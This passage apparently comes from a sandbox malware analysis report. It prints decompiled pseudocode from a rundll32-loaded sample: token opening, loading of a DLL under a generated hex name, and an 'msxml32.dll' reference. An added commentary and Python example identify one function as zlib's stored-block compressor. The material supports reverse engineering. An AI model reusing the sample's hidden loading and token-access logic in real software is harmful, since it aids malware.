            						_t74 = _t272 + 0x6c; // 0x51ec8b55
            						memcpy( *_t73 +  *_t74,  *((intOrPtr*)( *_t272)) - _t232, _t232);
            						_t225 = _a4;
            						_t273 = _t273 + 0xc;
            						_t76 = _t272 + 0x6c;
            						 *_t76 =  *(_t272 + 0x6c) + _t225;
            						__eflags =  *_t76;
            						_t78 = _t272 + 0x6c; // 0x51ec8b55
            						_t184 =  *_t78;
            						_t79 = _t272 + 0x2c; // 0x8df075ff
            						_t239 =  *_t79;
            					} else {
            						 *(_t272 + 0x16b0) = 2;
            						_t61 = _t272 + 0x38; // 0xf47d8bff
            						memcpy( *_t61,  *_t142 - _t224, _t224);
            						_t62 = _t272 + 0x2c; // 0x8df075ff
            						_t184 =  *_t62;
            						_t273 = _t273 + 0xc;
            						_t225 = _a4;
            						_t239 = _t184;
            						 *(_t272 + 0x6c) = _t184;
            					}
            					_t254 = _t184;
            					 *(_t272 + 0x5c) = _t184;
            					_t81 = _t272 + 0x16b4; // 0x830a74c0
            					_t185 =  *_t81;
            					_t240 = _t239 - _t185;
            					_t241 =  <=  ? _t225 : _t240;
            					_t242 = ( <=  ? _t225 : _t240) + _t185;
            					 *((intOrPtr*)(_t272 + 0x16b4)) = ( <=  ? _t225 : _t240) + _t185;
            				}
            				if( *(_t272 + 0x16c0) < _t254) {
            					 *(_t272 + 0x16c0) = _t254;
            				}
            				if(_t269 == 0) {
            					_t218 = _a8;
            					__eflags = _t218;
            					if(_t218 == 0) {
            						L34:
            						_t89 = _t272 + 0x3c; // 0x830cc483
            						_t219 =  *_t272;
            						_t145 =  *_t89 - _t254 - 1;
            						_a4 =  *_t272;
            						_t234 = _t254;
            						_v16 = _t145;
            						_v8 = _t254;
            						__eflags =  *((intOrPtr*)(_t219 + 4)) - _t145;
            						if( *((intOrPtr*)(_t219 + 4)) > _t145) {
            							_v8 = _t254;
            							_t95 = _t272 + 0x5c; // 0xee85000
            							_a4 = _t219;
            							_t234 = _t254;
            							_t97 = _t272 + 0x2c; // 0x8df075ff
            							__eflags =  *_t95 -  *_t97;
            							if( *_t95 >=  *_t97) {
            								_t98 = _t272 + 0x2c; // 0x8df075ff
            								_t167 =  *_t98;
            								_t259 = _t254 - _t167;
            								_t99 = _t272 + 0x38; // 0xf47d8bff
            								 *(_t272 + 0x5c) =  *(_t272 + 0x5c) - _t167;
            								 *(_t272 + 0x6c) = _t259;
            								memcpy( *_t99, _t167 +  *_t99, _t259);
            								_t103 = _t272 + 0x16b0; // 0x8508458b
            								_t170 =  *_t103;
            								_t273 = _t273 + 0xc;
            								__eflags = _t170 - 2;
            								if(_t170 < 2) {
            									_t172 = _t170 + 1;
            									__eflags = _t172;
            									 *(_t272 + 0x16b0) = _t172;
            								}
            								_t106 = _t272 + 0x2c; // 0x8df075ff
            								_t145 = _v16 +  *_t106;
            								__eflags = _t145;
            								_a4 =  *_t272;
            								_t108 = _t272 + 0x6c; // 0x51ec8b55
            								_t234 =  *_t108;
            								_v8 = _t234;
            							}
            						}
            						_t255 = _a4;
            						_t220 =  *((intOrPtr*)(_a4 + 4));
            						__eflags = _t145 - _t220;
            						_t221 =  <=  ? _t145 : _t220;
            						_t146 = _t221;
            						_a4 = _t221;
            						_t222 = _a8;
            						__eflags = _t146;
            						if(_t146 != 0) {
            							_t114 = _t272 + 0x38; // 0xf47d8bff
            							E03476020(_t255,  *_t114 + _v8, _t146);
            							_t273 = _t273 + 0xc;
            							_t117 = _t272 + 0x6c;
            							 *_t117 =  *(_t272 + 0x6c) + _a4;
            							__eflags =  *_t117;
            							_t119 = _t272 + 0x6c; // 0x51ec8b55
            							_t234 =  *_t119;
            						}
            						__eflags =  *(_t272 + 0x16c0) - _t234;
            						if( *(_t272 + 0x16c0) < _t234) {
            							 *(_t272 + 0x16c0) = _t234;
            						}
            						_t122 = _t272 + 0x16bc; // 0x5d08408b
            						_t123 = _t272 + 0xc; // 0x452bf84d
            						_t257 =  *_t123 - ( *_t122 + 0x2a >> 3);
            						__eflags = _t257 - 0xffff;
            						_t258 =  >  ? 0xffff : _t257;
            						_t124 = _t272 + 0x2c; // 0x8df075ff
            						_t151 =  *_t124;
            						_t125 = _t272 + 0x5c; // 0xee85000
            						_t235 = _t234 -  *_t125;
            						__eflags = _t258 - _t151;
            						_t152 =  <=  ? _t258 : _t151;
            						__eflags = _t235 - ( <=  ? _t258 : _t151);
            						if(_t235 >= ( <=  ? _t258 : _t151)) {
            							L49:
            							__eflags = _t235 - _t258;
            							_t154 =  >  ? _t258 : _t235;
            							_a4 =  >  ? _t258 : _t235;
            							__eflags = _t222 - 4;
            							if(_t222 != 4) {
            								L53:
            								_t269 = 0;
            								__eflags = 0;
            							} else {
            								_t161 =  *_t272;
            								__eflags =  *(_t161 + 4);
            								_t154 = _a4;
            								if( *(_t161 + 4) != 0) {
            									goto L53;
            								} else {
            									__eflags = _t154 - _t235;
            									if(_t154 != _t235) {
            										goto L53;
            									} else {
            										_t269 = _t222 - 3;
            									}
            								}
            							}
            							_t131 = _t272 + 0x38; // 0xf47d8bff
            							_t132 = _t272 + 0x5c; // 0xee85000
            							E03477180(_t272, _t272,  *_t131 +  *_t132, _t154, _t269);
            							_t134 = _t272 + 0x5c;
            							 *_t134 =  *(_t272 + 0x5c) + _a4;
            							__eflags =  *_t134;
            							E03475EE0( *_t134,  *_t272);
            						} else {
            							__eflags = _t235;
            							if(_t235 != 0) {
            								L46:
            								__eflags = _t222;
            								if(_t222 != 0) {
            									_t162 =  *_t272;
            									__eflags =  *(_t162 + 4);
            									if( *(_t162 + 4) == 0) {
            										__eflags = _t235 - _t258;
            										if(_t235 <= _t258) {
            											goto L49;
            										}
            									}
            								}
            							} else {
            								__eflags = _t222 - 4;
            								if(_t222 == 4) {
            									goto L46;
            								}
            							}
            						}
            						asm("sbb edi, edi");
            						_t271 =  ~_t269 & 0x00000002;
            						__eflags = _t271;
            						return _t271;
            					} else {
            						__eflags = _t218 - 4;
            						if(_t218 == 4) {
            							goto L34;
            						} else {
            							_t173 =  *_t272;
            							__eflags =  *(_t173 + 4);
            							if( *(_t173 + 4) != 0) {
            								goto L34;
            							} else {
            								_t88 = _t272 + 0x5c; // 0xee85000
            								__eflags = _t254 -  *_t88;
            								if(_t254 !=  *_t88) {
            									goto L34;
            								} else {
            									return 1;
            								}
            							}
            						}
            					}
            				} else {
            					return 3;
            				}
            			}

            (Instruction address column omitted: one address per listing line, running from 0x03474166 to 0x034744f4.)

            Memory Dump Source
            • Source File: 00000004.00000002.252645898.0000000003460000.00000040.00000800.00020000.00000000.sdmp, Offset: 03460000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_4_2_3460000_rundll32.jbxd
            Similarity
            • API ID: memcpy
            • String ID:
            • API String ID: 3510742995-0
            • Opcode ID: 03b0abeb86da1b833a58bdc3ae0fa7b72a6af37fe1020f7e2813aec2e01359af
            • Instruction ID: 7d600389852f5f6b880b2b0efc3327794c4bed16a6e48658cd2278bfa1b8f69b
            • Opcode Fuzzy Hash: 03b0abeb86da1b833a58bdc3ae0fa7b72a6af37fe1020f7e2813aec2e01359af
            • Instruction Fuzzy Hash: 94D12A756007009FCB24CF6EC9C49AAB7E5FF88344B18896EE88ACB751D731E945CB58
            Uniqueness
            • Uniqueness Score: -1.00%

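E03474160 is not malware logic: it is zlib's deflate_stored(), in the rewritten form the library has carried since 1.2.11, statically linked into the sample. The tells are all in the listing. `_t272` is the deflate_state and `*_t272` its z_stream: `*_t272 + 4` / `+ 0xc` / `+ 0x10` / `+ 0x14` are avail_in, next_out, avail_out and total_out; `_t272 + 8` / `+ 0x14` are pending_buf and pending, `+ 0x38` window, `+ 0x3c` window_size, `+ 0x5c` block_start, `+ 0x6c` strstart, `+ 0x16b4` insert, `+ 0x16bc` bi_valid and `+ 0x16c0` high_water. The prologue computes `MIN(pending_buf_size - 5, w_size)` (the `+ 0xfffffffb` on `_t272 + 0xc` against `_t272 + 0x2c`), `(bi_valid + 42) >> 3` is the `+ 0x2a >> 3`, the 0xffff clamp is MAX_STORED, `_a8 == 4` is `flush == Z_FINISH`, and the four byte stores at `pending - 4 .. pending - 1` write LEN, LEN >> 8, ~LEN and ~LEN >> 8, the stored-block length header that `E03475EE0` (flush_pending) then pushes out. `E03477180(s, 0, 0, last)` is `_tr_stored_block`, `E03476020(strm, next_out, len)` is `read_buf`, and the returns 3, 1 and `~edi & 2` are finish_done, block_done and finish_started/need_more. Recognising library code like this saves reverse-engineering time and explains the `memcpy` API ID. The Python below is an added example written for this page, not code from the sample or the report: it writes the same stored-block framing the listing writes, parses it back with the LEN == ~NLEN check a consumer must make before trusting LEN, and cross-checks both against the zlib module's own level-0 output. The sample input is constructed.

```python
import struct
import zlib

MAX_STORED = 0xFFFF   # largest stored block; the 0xffff clamp in the listing (_v12 / _t258)


def encode_stored(data):
    """Frame `data` as raw deflate built only from stored blocks, the way the listing does:
    a 3-bit header (BFINAL, BTYPE=00) padded to a byte, then LEN and NLEN = ~LEN, then the bytes."""
    out = bytearray()
    pos = 0
    while True:
        chunk = data[pos:pos + MAX_STORED]
        pos += len(chunk)
        final = pos >= len(data)
        n = len(chunk)
        out.append(0x01 if final else 0x00)
        # The four byte stores in the listing: n, n >> 8, ~n, ~n >> 8 (little-endian LEN, NLEN)
        out += struct.pack("<HH", n, (~n) & 0xFFFF)
        out += chunk
        if final:
            return bytes(out)


def parse_stored_blocks(stream):
    """Walk a raw-deflate stream made only of stored blocks.

    Returns (payload, blocks) with blocks = [(offset, length, is_final)].
    Raises ValueError on a non-stored block, a LEN/NLEN mismatch, or truncation."""
    out = bytearray()
    blocks = []
    pos = 0
    while True:
        if pos + 5 > len(stream):
            raise ValueError(f"truncated block header at {pos}")
        header = stream[pos]
        bfinal, btype = header & 1, (header >> 1) & 3
        if btype != 0:
            raise ValueError(f"block at {pos} is not stored (BTYPE={btype})")
        # After the 3 header bits the encoder pads to the next byte, so LEN/NLEN start at pos + 1.
        # A stored payload ends byte-aligned, so every following stored block is byte-aligned too.
        length, nlength = struct.unpack_from("<HH", stream, pos + 1)
        if length != (~nlength) & 0xFFFF:
            raise ValueError(f"LEN/NLEN mismatch at {pos + 1}: {length:#06x} vs {nlength:#06x}")
        start = pos + 5
        chunk = stream[start:start + length]
        if len(chunk) != length:
            raise ValueError(f"truncated payload at {start}")
        out += chunk
        blocks.append((pos, length, bool(bfinal)))
        pos = start + length
        if bfinal:
            return bytes(out), blocks


def zlib_level0_raw(data):
    """Reference stream from zlib itself: level 0 selects deflate_stored, wbits=-15 gives raw framing."""
    c = zlib.compressobj(level=0, wbits=-15)
    return c.compress(data) + c.flush()


if __name__ == "__main__":
    sample = bytes(range(256)) * 300          # constructed input, 76,800 bytes: needs two blocks
    ours = encode_stored(sample)
    assert zlib.decompress(ours, -15) == sample
    payload, blocks = parse_stored_blocks(zlib_level0_raw(sample))
    assert payload == sample
    for offset, length, final in blocks:
        print(f"stored block at {offset:6d}: LEN={length:5d} final={final}")
```

The block count zlib produces for the same input depends on its output buffering (the `avail_out` checks in the listing), so the cross-check only asserts the payload round-trips and no block exceeds MAX_STORED; the encoder here is deterministic and always splits at 65535.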
            C-Code - Quality: 100%
            			E0346C92F(void* __ecx) {
            				void* _v8;
            				void* _t10;
            				intOrPtr _t13;
            
            				if(OpenThreadToken(GetCurrentThread(), 8, 0,  &_v8) != 0) {
            					L4:
            					_t10 = _v8;
            				} else {
            					if(GetLastError() != 0x3f0) {
            						L3:
            						_t10 = 0;
            					} else {
            						_t13 =  *0x347f8d0; // 0x50ff8c0
            						if(OpenProcessToken( *((intOrPtr*)(_t13 + 0x12c))(), 8,  &_v8) != 0) {
            							goto L4;
            						} else {
            							goto L3;
            						}
            					}
            				}
            				return _t10;
            			}


            (Instruction address column omitted: one address per listing line, running from 0x0346c94e to 0x0346c985.)

            APIs
            • GetCurrentThread.KERNEL32 ref: 0346C942
            • OpenThreadToken.ADVAPI32(00000000,?,?,0346CA74,00000000,03460000), ref: 0346C949
            • GetLastError.KERNEL32(?,?,0346CA74,00000000,03460000), ref: 0346C950
            • OpenProcessToken.ADVAPI32(00000000,?,?,0346CA74,00000000,03460000), ref: 0346C975
            Memory Dump Source
            • Source File: 00000004.00000002.252645898.0000000003460000.00000040.00000800.00020000.00000000.sdmp, Offset: 03460000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_4_2_3460000_rundll32.jbxd
            Similarity
            • API ID: OpenThreadToken$CurrentErrorLastProcess
            • String ID:
            • API String ID: 1515895013-0
            • Opcode ID: eff94c41e8ac848aae07c147d97b9b7714d0e0ea77e93e6cd6a03e79668b5c49
            • Instruction ID: e3c34b7029660f8a0c8e321b4f5739c962f422dbe7d6184fee95e072e3521c29
            • Opcode Fuzzy Hash: eff94c41e8ac848aae07c147d97b9b7714d0e0ea77e93e6cd6a03e79668b5c49
            • Instruction Fuzzy Hash: 5EF03A32A01245ABDB00EBB4D849FAA73ECFB08200F040491E682EB154D760E9088FA5
            Uniqueness
            • Uniqueness Score: -1.00%

            C-Code - Quality: 89%
            			E0346D309(void* __ebx, void* __edx, void* __edi, void* __esi) {
            				char _v8;
            				char _v12;
            				char _v140;
            				signed char _t14;
            				char _t15;
            				intOrPtr _t20;
            				void* _t25;
            				intOrPtr _t26;
            				intOrPtr _t32;
            				WCHAR* _t34;
            				intOrPtr _t35;
            				struct HINSTANCE__* _t37;
            				intOrPtr _t38;
            				intOrPtr _t46;
            				void* _t47;
            				intOrPtr _t50;
            				void* _t60;
            				void* _t61;
            				char _t62;
            				void* _t65;
            				intOrPtr _t66;
            				char _t68;
            
            				_t65 = __esi;
            				_t61 = __edi;
            				_t47 = __ebx;
            				_t50 =  *0x347f8d4; // 0x50ffc00
            				_t1 = _t50 + 0x1898; // 0x0
            				_t14 =  *_t1;
            				if(_t14 == 0x100 ||  *((intOrPtr*)(_t50 + 4)) >= 0xa && (_t14 & 0x00000004) != 0) {
            					_t15 = E03469F85(_t50, 0xb9d);
            					_t66 =  *0x347f8d4; // 0x50ffc00
            					_t62 = _t15;
            					_t67 = _t66 + 0xb0;
            					_v8 = _t62;
            					E03469FE4( &_v140, 0x40, L"%08x", E0346E34A(_t66 + 0xb0, E0346A5D0(_t66 + 0xb0), 0));
            					_t20 =  *0x347f8d4; // 0x50ffc00
            					_t7 = _t20 + 0xa8; // 0x1
            					asm("sbb eax, eax");
            					_t25 = E03469F85(_t67, ( ~( *_t7) & 0xfffffeb6) + 0xded);
            					_t26 =  *0x347f8d4; // 0x50ffc00
            					_t68 = E03469C50(_t26 + 0x1020);
            					_v12 = _t68;
            					E03468D9A( &_v8);
            					_t32 =  *0x347f8d4; // 0x50ffc00
            					_t34 = E03469C50(_t32 + 0x122a);
            					 *0x347f9d4 = _t34;
            					_t35 =  *0x347f8d0; // 0x50ff8c0
            					 *((intOrPtr*)(_t35 + 0x11c))(_t68, _t34, 0, 0x347c9d8,  &_v140, ".", L"dll", 0, 0x347c9d8, _t25, 0x347c9d8, _t62, 0, _t61, _t65, _t47);
            					_t37 = LoadLibraryW( *0x347f9d4);
            					 *0x347f9cc = _t37;
            					if(_t37 == 0) {
            						_t38 = 0;
            					} else {
            						_push(_t37);
            						_t60 = 0x28;
            						_t38 = E0346F08E(0x347cbc4, _t60);
            					}
            					 *0x347f9d0 = _t38;
            					E03468DDF( &_v12, 0xfffffffe);
            					E03468F63( &_v140, 0, 0x80);
            					if( *0x347f9d0 != 0) {
            						goto L10;
            					} else {
            						E03468DDF(0x347f9d4, 0xfffffffe);
            						goto L8;
            					}
            				} else {
            					L8:
            					if( *0x347f9d0 == 0) {
            						_t46 =  *0x347f908; // 0x50ffa00
            						 *0x347f9d0 = _t46;
            					}
            					L10:
            					return 1;
            				}
            			}

            (Instruction address column omitted: one address per listing line, running from 0x0346d309 to 0x0346d47b.)

            Memory Dump Source
            • Source File: 00000004.00000002.252645898.0000000003460000.00000040.00000800.00020000.00000000.sdmp, Offset: 03460000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_4_2_3460000_rundll32.jbxd
            Similarity
            • API ID: LibraryLoad
            • String ID: %08x$dll
            • API String ID: 1029625771-2963171978
            • Opcode ID: 84b1108da616e2af18c1c72ab2467538e7671a3eccef40bc907bc156df18f92c
            • Instruction ID: 22432126b7dc24d92953c538195bbfd94f5876e28c4938d380d74daa0604c79f
            • Opcode Fuzzy Hash: 84b1108da616e2af18c1c72ab2467538e7671a3eccef40bc907bc156df18f92c
            • Instruction Fuzzy Hash: 3C31B5B2A04204BFD710EF69DC45FAA73ECEB49214F18416BF005EF284DB749D488B69
            Uniqueness
            • Uniqueness Score: -1.00%

            C-Code - Quality: 47%
            			E034736D5(void* __eflags, long long __fp0, intOrPtr _a4, intOrPtr _a8, signed int _a12) {
            				char _v5;
            				long long _v12;
            				short _v20;
            				signed int _t15;
            				void* _t16;
            				signed int _t22;
            				char _t25;
            				void* _t26;
            				signed int _t28;
            				intOrPtr _t29;
            				void* _t31;
            				char** _t32;
            				long long _t40;
            				long long _t41;
            
            				_t40 = __fp0;
            				_t15 = E034735EE(_a4);
            				 *_t32 = "msxml32.dll";
            				_t28 = _t15 & 0x0fffffff;
            				_t16 = E0346A5D0();
            				_t26 = 0xf;
            				_t25 = 0;
            				_v5 = 0;
            				if(_t16 > _t26) {
            					L2:
            					_t3 = _t25 + 0x41; // 0x41
            					 *((char*)(_t31 + _t25 - 0x10)) = _t3;
            					_t25 = _t25 + 1;
            				} else {
            					_t26 = _t16;
            					if(_t26 != 0) {
            						do {
            							goto L2;
            						} while (_t25 < _t26);
            					}
            				}
            				lstrlenW( &_v20);
            				_t29 = _a8;
            				_t22 = _a12 - _t29 + 1;
            				_a12 = _t22;
            				asm("fild dword [ebp+0x10]");
            				if(_t22 < 0) {
            					_t40 = _t40 +  *0x347cf90;
            				}
            				_a12 = _t28;
            				_v12 = _t40;
            				_t41 = _v12;
            				asm("fild dword [ebp+0x10]");
            				if(_t28 < 0) {
            					_t41 = _t41 +  *0x347cf90;
            				}
            				_v12 = _t41;
            				asm("fmulp st1, st0");
            				L03478995();
            				return _t29 - _t22;
            			}

            APIs
            • lstrlenW.KERNEL32(?,000000B0,000000B0,?,00000000,000000B0,00000228), ref: 0347371C
            • _ftol2_sse.MSVCRT ref: 0347375F
            Strings
            Memory Dump Source
            • Source File: 00000004.00000002.252645898.0000000003460000.00000040.00000800.00020000.00000000.sdmp, Offset: 03460000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_4_2_3460000_rundll32.jbxd
            Yara matches
            Similarity
            • API ID: _ftol2_sselstrlen
            • String ID: msxml32.dll
            • API String ID: 1292649733-2051705522
            • Opcode ID: 33b873b88df8ac9856f07ab6415bf08e214c7b60318bd7bef42870a04a719aac
            • Instruction ID: d8689bb73729a46f07181134a908cf05020234a8016986f5b36b4221cefb4148
            • Opcode Fuzzy Hash: 33b873b88df8ac9856f07ab6415bf08e214c7b60318bd7bef42870a04a719aac
            • Instruction Fuzzy Hash: 0311E57AA00349ABCF00EF69E8044DE7FB5FF84310F2685ABD854DE249EB30C5659789
            Uniqueness

            Uniqueness Score: -1.00%